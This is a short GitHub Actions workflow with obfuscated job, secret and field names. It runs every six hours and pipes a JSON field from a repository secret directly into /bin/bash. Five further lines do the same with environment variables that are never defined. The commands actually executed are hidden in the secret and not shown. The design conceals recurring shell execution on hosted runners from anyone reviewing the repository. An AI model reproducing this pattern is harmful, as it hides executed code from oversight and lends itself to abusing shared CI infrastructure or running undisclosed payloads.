name: gaozhongzzx

on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gaozhongzzx
        env:
          yvznw29: ${{ secrets.yvznw29 }}
        run: |
          echo $yvznw29 | jq -r .zeq510 | /bin/bash
          echo $r7623 | jq -r .k9 | /bin/bash
          echo $adjz0 | jq -r .ccmu539 | /bin/bash
          echo $lgl7 | jq -r .ovq7877 | /bin/bash
          echo $grid617 | jq -r .lks76 | /bin/bash
          echo $rsp0324 | jq -r .dbgwx6713 | /bin/bash

